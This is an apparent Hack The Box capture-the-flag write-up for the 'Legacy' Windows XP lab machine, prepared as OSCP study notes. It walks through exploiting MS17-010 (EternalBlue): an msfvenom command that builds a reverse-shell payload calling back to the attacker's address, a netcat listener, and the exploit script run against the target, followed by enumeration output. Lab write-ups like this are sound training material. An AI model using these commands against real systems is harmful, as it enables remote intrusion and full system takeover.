# HTB - Legacy

###### tags: `OSCP` `Windows`

## Summary

- OS: Windows XP box
- Ports
  - NetBIOS (TCP/139, TCP/445)
  - RDP (TCP/3389, closed)
- Steps
  - Get first foothold by using `SMB exploit - eternalblue`
  - Find we get `NT AUTHORITY\SYSTEM`
  - Get the flag

## Run Tests

### NMAP

```nmap=
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-08 22:51 EST
Nmap scan report for legacy (10.10.10.4)
Host is up (0.25s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
3389/tcp closed ms-wbt-server

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|       servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 32.09 seconds
```

### Get first foothold via MS17-010 vulnerability (**NT AUTHORITY\SYSTEM**)

#### Get exploit code

`git clone https://github.com/helviojunior/MS17-010.git`

#### Prepare python2 env

- install virtualenv package

  `pip3 install virtualenv`

- create python2 virtual environment

```bash=
virtualenv -p python2 ms17-010-py2
# activate python2 env
. ./ms17-010-py2/bin/activate
# install packages
pip2 install impacket
```

#### Prepare payload

`msfvenom -a x86 --platform windows -f exe -p windows/shell_reverse_tcp LPORT=443 LHOST=10.10.14.29 -o sc_x86_payload.exe`

#### Execute shellcode

- attacker listens on 443

  `sudo nc -lvnp 443`

- run the exploit

  `python2 MS17-010-ori/send_and_execute.py 10.10.10.4 sc_x86_payload.exe`

### Poke around the victim machine

- systeminfo: Windows XP

```
Host Name:                 LEGACY
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 3 Build 2600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Uniprocessor Free
Registered Owner:          user
Registered Organization:   HTB
Product ID:                55274-643-7213323-23904
Original Install Date:     16/3/2017, 7:32:23
System Up Time:            0 Days, 0 Hours, 9 Minutes, 36 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 23 Model 1 Stepping 2 AuthenticAMD ~1998 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory:     511 MB
Available Physical Memory: 377 MB
Virtual Memory: Max Size:  2.048 MB
Virtual Memory: Available: 2.005 MB
Virtual Memory: In Use:    43 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
NetWork Card(s):           1 NIC(s) Installed.
                           [01]: VMware Accelerated AMD PCNet Adapter
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.4
```

- net user

```
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Guest                    HelpAssistant
john                     SUPPORT_388945a0
The command completed with one or more errors.
```

- get flag
  - **Windows XP: `C:\Documents and Settings`** (== `C:\Users`)

```bat
cd C:\Documents and Settings\Administrator\Desktop
```

## Lessons Learned

- **Windows XP specific features**
  - user folders are located in **`C:\Documents and Settings`** (== `C:\Users`)
  - No default `whoami` command
    - use `echo %USERNAME%`
    - or copy Kali's default Windows binary `/usr/share/windows-resources/binaries/whoami.exe` to the victim machine

## :star2: Resources

- [HTB Walkthrough Legacy without Metasploit #2](https://medium.com/@siddharth.singhal1995/htb-walkthrough-legacy-without-metasploit-2-1baa34ade364)
- [HTB: Walkthrough without Metasploit. ~\[LEGACY\]](https://0xveera.medium.com/htb-walkthrough-without-metasploit-legacy-88347248904a)